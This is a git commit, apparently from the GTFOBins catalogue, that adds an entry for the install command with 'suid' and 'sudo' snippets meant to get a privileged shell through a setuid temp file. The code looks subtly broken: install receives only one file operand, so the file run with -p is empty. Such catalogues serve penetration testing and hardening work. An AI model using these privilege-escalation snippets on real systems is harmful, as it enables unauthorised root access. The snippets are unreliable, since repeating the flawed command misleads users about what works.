New command: install

master
Emanuel Duss 2020-11-13 11:59:14 +01:00
parent 5a3e672d23
commit 146b146cd3
1 changed files with 13 additions and 0 deletions

13
_gtfobins/install.md Normal file
View File

@ -0,0 +1,13 @@
---
functions:
suid:
- code: |
TF=$(mktemp)
install -m 4755 $TF
$TF -p
sudo:
- code: |
TF=$(mktemp)
sudo install -m 4755 $TF
$TF -p
---